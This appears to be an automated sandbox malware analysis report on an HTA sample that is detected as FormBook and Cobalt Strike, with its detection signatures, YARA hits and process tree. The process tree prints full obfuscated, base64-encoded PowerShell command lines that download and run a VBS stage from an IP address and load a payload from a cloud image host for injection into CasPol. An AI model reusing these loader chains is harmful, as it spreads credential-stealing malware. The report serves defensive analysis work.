Edit tour
Windows
Analysis Report
goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta
Overview
General Information
| Sample name: | goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta |
| Analysis ID: | 1574255 |
| MD5: | db521beb834b08845d50b334054c4e2d |
| SHA1: | 6a9588668d1dc29631b57d022b2194f884854a75 |
| SHA256: | e32b43fe4921503121a4a547362eb8a67a50f6d2dee0c18b409c8655af008645 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
Cobalt Strike, FormBook
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected obfuscated html page
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 1088 cmdline: mshta.exe "C:\Users\ user\Deskt op\goodthh ingswithgr eatcapital thingsforg reatnewswi thgoodmorn g.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
cmd.exe (PID: 6036 cmdline: "C:\Window s\system32 \cmd.exe" "/c POwers heLl -eX BYPaSS -nop -W 1 -C DeviCecre dEnTIalDEP LOYMEnt.Ex e ; iNVO ke-expRESS iON($(iNvO kE-ExpRESS ioN('[Syst eM.TEXT.EN cODiNG]'+[ cHaR]58+[C har]0x3a+' Utf8.GeTST riNG([SYsT em.CoNVERT ]'+[Char]5 8+[ChAR]0X 3A+'FRombA Se64STRIng ('+[chAR]0 X22+'JEw0Z ndkeXlMajA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgPSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBhRGQtVHl wZSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT UVNYkVSZEV GSU5JVGlPb iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgiVVJsTU9 OLmRMTCIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgWFRvU EFva1FsLHN 0cmluZyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBtRFBqS3B BLHN0cmluZ yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBYZ0J oTVZaLHVpb nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgZFN FSkFZa3BHL EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICB5eXVaQ 0FMWVkpOyc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLW5hT WUgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIkV SaUlMZk4iI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIC1uQU1 lc1BhQ2UgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQXogICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLVBhc3NUa HJ1OyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA kTDRmd2R5e UxqMDo6VVJ MRG93bmxvY WRUb0ZpbGU oMCwiaHR0c DovLzEwNy4 xNzIuNDQuM Tc1LzczL3N pbXBsZWNvb 2tpZWJpc2N 1dHdpdGhzd 2VldG5lc3N mb3JlbnRpc mV0aW1lLnR JRiIsIiRlT nY6QVBQREF UQVxzaW1wb GVjb29raWV iaXNjdXR3a XRoc3dlZXR uZXNzZm9yZ W50aXIudmJ TIiwwLDApO 3NUQXJULVN sZUVwKDMpO 0lOdk9rZS1 FWFBSZXNza W9OICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICI kZU5WOkFQU ERBVEFcc2l tcGxlY29va 2llYmlzY3V 0d2l0aHN3Z WV0bmVzc2Z vcmVudGlyL nZiUyI='+[ ChAr]0X22+ '))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 5144 cmdline: POwersheLl -e X BY PaSS -nop -W 1 - C De viCecredEn TIalDEPLOY MEnt.Exe ; iNVOke- expRESSiON ($(iNvOkE- ExpRESSioN ('[SysteM. TEXT.ENcOD iNG]'+[cHa R]58+[Char ]0x3a+'Utf 8.GeTSTriN G([SYsTem. CoNVERT]'+ [Char]58+[ ChAR]0X3A+ 'FRombASe6 4STRIng('+ [chAR]0X22 +'JEw0Zndk eXlMajAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgPSAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBh RGQtVHlwZS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtTUVN YkVSZEVGSU 5JVGlPbiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAnW0RsbE ltcG9ydCgi VVJsTU9OLm RMTCIsICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IENoYXJTZX QgPSBDaGFy U2V0LlVuaW NvZGUpXXB1 YmxpYyBzdG F0aWMgZXh0 ZXJuIEludF B0ciBVUkxE b3dubG9hZF RvRmlsZShJ bnRQdHIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgWFRvUEFv a1FsLHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBt RFBqS3BBLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBYZ0JoTV ZaLHVpbnQg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgZFNFSk FZa3BHLElu dFB0ciAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC B5eXVaQ0FM WVkpOycgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLW5hTWUg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIkVSaU lMZk4iICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IC1uQU1lc1 BhQ2UgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg QXogICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLV Bhc3NUaHJ1 OyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAkTD Rmd2R5eUxq MDo6VVJMRG 93bmxvYWRU b0ZpbGUoMC wiaHR0cDov LzEwNy4xNz IuNDQuMTc1 LzczL3NpbX BsZWNvb2tp ZWJpc2N1dH dpdGhzd2Vl dG5lc3Nmb3 JlbnRpcmV0 aW1lLnRJRi IsIiRlTnY6 QVBQREFUQV xzaW1wbGVj b29raWViaX NjdXR3aXRo c3dlZXRuZX NzZm9yZW50 aXIudmJTIi wwLDApO3NU QXJULVNsZU VwKDMpO0lO dk9rZS1FWF BSZXNzaW9O ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICIkZU 5WOkFQUERB VEFcc2ltcG xlY29va2ll YmlzY3V0d2 l0aHN3ZWV0 bmVzc2Zvcm VudGlyLnZi UyI='+[ChA r]0X22+')) ')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
csc.exe (PID: 4796 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\j4tmsurx \j4tmsurx. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 1372 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SC568.tmp" "c:\Users \user\AppD ata\Local\ Temp\j4tms urx\CSCD8A 49667F2D24 8CBA423D29 C56F4A9D.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) 
wscript.exe (PID: 6552 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\simpl ecookiebis cutwithswe etnessfore ntir.vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 1096 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $claustrop hobe = 'JG F1dG9zYXZl ID0gJ2h0dH BzOi8vcmVz LmNsb3VkaW 5hcnkuY29t L2R5dGZsdD Yxbi9pbWFn ZS91cGxvYW QvdjE3MzMx MzQ5NDcvYm tscHlzZXll dXQ0aW1wdz UwbjEuanBn ICc7JGNoZW 1vdHJvcGlz bSA9IE5ldy 1PYmplY3Qg U3lzdGVtLk 5ldC5XZWJD bGllbnQ7JH F1ZWVmID0g JGNoZW1vdH JvcGlzbS5E b3dubG9hZE RhdGEoJGF1 dG9zYXZlKT skcHVua2xp bmcgPSBbU3 lzdGVtLlRl eHQuRW5jb2 RpbmddOjpV VEY4LkdldF N0cmluZygk cXVlZWYpOy R0dWJlcmN1 bG9waG9iaW EgPSAnPDxC QVNFNjRfU1 RBUlQ+Pic7 JGZlbXRvY2 91bG9tYiA9 ICc8PEJBU0 U2NF9FTkQ+ Pic7JHVudG hyaWZ0eSA9 ICRwdW5rbG luZy5JbmRl eE9mKCR0dW JlcmN1bG9w aG9iaWEpOy RoYW1tYW0g PSAkcHVua2 xpbmcuSW5k ZXhPZigkZm VtdG9jb3Vs b21iKTskdW 50aHJpZnR5 IC1nZSAwIC 1hbmQgJGhh bW1hbSAtZ3 QgJHVudGhy aWZ0eTskdW 50aHJpZnR5 ICs9ICR0dW JlcmN1bG9w aG9iaWEuTG VuZ3RoOyRw ZXRyb2RvbG xhciA9ICRo YW1tYW0gLS AkdW50aHJp ZnR5OyRkYX N5YXRpZGFl ID0gJHB1bm tsaW5nLlN1 YnN0cmluZy gkdW50aHJp ZnR5LCAkcG V0cm9kb2xs YXIpOyRkaW dpdGFsaXNp bmcgPSAtam 9pbiAoJGRh c3lhdGlkYW UuVG9DaGFy QXJyYXkoKS B8IEZvckVh Y2gtT2JqZW N0IHsgJF8g fSlbLTEuLi 0oJGRhc3lh dGlkYWUuTG VuZ3RoKV07 JHVuaWRlYW xpemVkID0g W1N5c3RlbS 5Db252ZXJ0 XTo6RnJvbU Jhc2U2NFN0 cmluZygkZG lnaXRhbGlz aW5nKTskY2 9tbWVuZGlu ZyA9IFtTeX N0ZW0uUmVm bGVjdGlvbi 5Bc3NlbWJs eV06OkxvYW QoJHVuaWRl YWxpemVkKT skamFwb25p Y2FzID0gW2 RubGliLklP LkhvbWVdLk dldE1ldGhv ZCgnVkFJJy k7JGphcG9u aWNhcy5Jbn Zva2UoJG51 bGwsIEAoJz AvY3VWREUv ci9lZS5ldH NhcC8vOnNw dHRoJywgJy Rjb25maWRl bnRpYWxpdH knLCAnJGNv bmZpZGVudG lhbGl0eScs ICckY29uZm lkZW50aWFs aXR5JywgJ0 Nhc1BvbCcs ICckY29uZm lkZW50aWFs aXR5JywgJy Rjb25maWRl bnRpYWxpdH knLCckY29u ZmlkZW50aW FsaXR5Jywn JGNvbmZpZG VudGlhbGl0 eScsJyRjb2 5maWRlbnRp YWxpdHknLC ckY29uZmlk ZW50aWFsaX R5JywnJGNv bmZpZGVudG lhbGl0eScs JzEnLCckY2 9uZmlkZW50 aWFsaXR5Jy kpOw==';$u ninverted = [System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring($cla ustrophobe ));Invoke- Expression $uninvert ed MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2924 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - CasPol.exe (PID: 6780 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B) 
xwZkSdnVCDBnu.exe (PID: 3948 cmdline: "C:\Progra m Files (x 86)\NTWdPg zKzLbuxCjT rDXjuyVYGn rROhiyAyBo USHnPMBJRd rxUUFzxHrH bzfXIHvRb\ xwZkSdnVCD Bnu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717) - ieUnatt.exe (PID: 1276 cmdline:
"C:\Window s\SysWOW64 \ieUnatt.e xe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E) - xwZkSdnVCDBnu.exe (PID: 6160 cmdline:
"C:\Progra m Files (x 86)\NTWdPg zKzLbuxCjT rDXjuyVYGn rROhiyAyBo USHnPMBJRd rxUUFzxHrH bzfXIHvRb\ xwZkSdnVCD Bnu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717) 
firefox.exe (PID: 5252 cmdline: "C:\Progra m Files\Mo zilla Fire fox\Firefo x.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Click to see the 13 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||